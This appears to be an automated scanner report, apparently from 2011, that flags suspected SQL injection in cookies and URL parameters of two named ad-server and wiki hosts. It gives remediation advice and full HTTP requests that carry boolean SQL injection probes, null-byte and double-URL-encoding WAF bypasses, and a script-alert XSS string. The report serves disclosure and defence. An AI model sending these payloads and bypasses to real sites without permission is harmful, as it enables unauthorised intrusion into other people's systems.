SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The zs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zs parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The autotrdr_exclude cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the autotrdr_exclude cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the autotrdr_exclude cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /addyn/3.0/5242.1/1200349/0/225/ADTECH;alias=InformationWeek_Software_HP_Top_728x90;key=225700573b6576 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude%2527
Response 1
HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18937
The JEB2 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the JEB2 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /addyn/3.0/5242.1/1200449/0/225/ADTECH HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E%00'; autotrdr_exclude=autotrdr_exclude;
Response 1 (redirected)
HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18756
Request 2
GET /addyn/3.0/5242.1/1200449/0/225/ADTECH HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E%00''; autotrdr_exclude=autotrdr_exclude;
Response 2 (redirected)
HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 828
The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 7, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /addyn/3.0/5242.1/1200449/0/225/ADTECH%00' HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude;
Response 1
HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18756
Request 2
GET /addyn/3.0/5242.1/1200449/0/225/ADTECH%00'' HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude;
Response 2
HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 994
The WPC-action cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the WPC-action cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /page/After+Format+skip+the+Tap+to+set+up+windows+mobile+programatically HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action='%20and%201%3d1--%20; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:03:31 GMT
Server: Apache
Set-Cookie: wab=joinButton=38; Domain=htcwiki.wetpaint.com; Expires=Sun, 05-Feb-2012 16:03:31 GMT; Path=/
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1QkrqgzgwDAcPo6SRuabbqp; Domain=htcwiki.wetpaint.com; Path=/
Set-Cookie: JSESSIONID=FC676FF8175FB9189B56FD2C05DD08B6; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:03:31 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 37630
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>After Format skip the Tap to set up windows mobile programatically - HTC Smartphone Wiki</title>
<meta name="description" content="After Format skip the Tap to set up windows mobile programatically because my touch screen not working. i have been using the mobile for a year now with now touch..." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
<script type="text/javascript"> //<![CDATA[ var global_inits = {"NAMESPACE" : 'htcwiki',"WIKI_DISPLAY_NAME" : 'HTC Smartphone W ...[SNIP]...
Request 2
GET /page/After+Format+skip+the+Tap+to+set+up+windows+mobile+programatically HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action='%20and%201%3d2--%20; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:03:32 GMT
Server: Apache
Set-Cookie: wab=joinButton=82; Domain=htcwiki.wetpaint.com; Expires=Sun, 05-Feb-2012 16:03:32 GMT; Path=/
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1QkrqgzgwDAcGTetEI1fA+k; Domain=htcwiki.wetpaint.com; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:03:32 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 37629
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>After Format skip the Tap to set up windows mobile programatically - HTC Smartphone Wiki</title>
<meta name="description" content="After Format skip the Tap to set up windows mobile programatically because my touch screen not working. i have been using the mobile for a year now with now touch..." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
The wetst cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /page/HTC+BLUE+ANGEL HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r'%20and%201%3d1--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:04:26 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1SW7KYlyOAb4H880Qv8zfr+; Domain=htcwiki.wetpaint.com; Path=/
Set-Cookie: JSESSIONID=D81A586ADE0621AAB28668E041DF5C6E; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:04:26 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 57727
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>HTC Blue Angel - HTC Smartphone Wiki</title>
<meta name="keywords" content="HTC Blue Angel - HTC Smartphone Wiki, Blue Angel,Smartphone" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
Request 2
GET /page/HTC+BLUE+ANGEL HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r'%20and%201%3d2--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:04:28 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1SW7KYlyOAb4BEEDqu1Zw35; Domain=htcwiki.wetpaint.com; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:04:28 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 57728
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>HTC Blue Angel - HTC Smartphone Wiki</title>
<meta name="keywords" content="HTC Blue Angel - HTC Smartphone Wiki, Blue Angel,Smartphone" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
The wetst cookie appears to be vulnerable to SQL injection attacks. The payloads 83263946'%20or%201%3d1--%20 and 83263946'%20or%201%3d2--%20 were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /page/Smartphone+Blogs+and+Forums HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r83263946'%20or%201%3d1--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:04:07 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Tglql35jUC/GnGyRMdMSYE; Domain=htcwiki.wetpaint.com; Path=/
Set-Cookie: JSESSIONID=6601282A68E6A62FD4318B3E0947F341; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:04:07 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 63010
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>Smartphone Blogs and Forums - HTC Smartphone Wiki</title>
<meta name="keywords" content="Smartphone Blogs and Forums - HTC Smartphone Wiki, BLOGS,forums,smartphones,software,Windows Mobile" /> <meta name="description" content="Phone now people than essential communication tools, also on behalf of the people's identity and status, how to please a secular concept to treat you and your phone,..." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
Request 2
GET /page/Smartphone+Blogs+and+Forums HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r83263946'%20or%201%3d2--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:04:07 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Tglql35jUC/A+6ceTtRjSe; Domain=htcwiki.wetpaint.com; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:04:07 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 63009
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>Smartphone Blogs and Forums - HTC Smartphone Wiki</title>
<meta name="keywords" content="Smartphone Blogs and Forums - HTC Smartphone Wiki, BLOGS,forums,smartphones,software,Windows Mobile" /> <meta name="description" content="Phone now people than essential communication tools, also on behalf of the people's identity and status, how to please a secular concept to treat you and your phone,..." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
The wetst cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /page/Smartphone+How-To HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r'%20and%201%3d1--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:03:05 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RFmQnSxpCUDaHC6p64G+mQ; Domain=htcwiki.wetpaint.com; Path=/
Set-Cookie: JSESSIONID=9241F2DA15E0BEA02A34D8A0A7517B1B; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:03:05 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 61669
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<meta name="keywords" content="Smartphone How-To - HTC Smartphone Wiki, enable internet radio stations,help,instructions" /> <meta name="description" content="Add a New Tip Use this section of the wiki to add helpful smartphone instructions, whether they are specific to a particular model or generic to all Windows Mobile..." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
Request 2
GET /page/Smartphone+How-To HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r'%20and%201%3d2--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:03:06 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RFmQnSxpCUDY8YVP9V3BKl; Domain=htcwiki.wetpaint.com; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:03:06 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 61668
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<meta name="keywords" content="Smartphone How-To - HTC Smartphone Wiki, enable internet radio stations,help,instructions" /> <meta name="description" content="Add a New Tip Use this section of the wiki to add helpful smartphone instructions, whether they are specific to a particular model or generic to all Windows Mobile..." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
The wetst cookie appears to be vulnerable to SQL injection attacks. The payloads 46190298'%20or%201%3d1--%20 and 46190298'%20or%201%3d2--%20 were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /page/Sprint+Touch HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r46190298'%20or%201%3d1--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1 (redirected)
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:03:34 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1QkrqgzgwDAcPRCQ+El/waa; Domain=htcwiki.wetpaint.com; Path=/
Set-Cookie: JSESSIONID=0CC9698F48A8526EEA3937B4F7BB20E6; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:03:34 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 55739
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<meta name="keywords" content="HTC Sprint Touch - HTC Smartphone Wiki, Sprint,Sprint Touch,TouchFlo" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
Request 2
GET /page/Sprint+Touch HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r46190298'%20or%201%3d2--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2 (redirected)
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:03:35 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
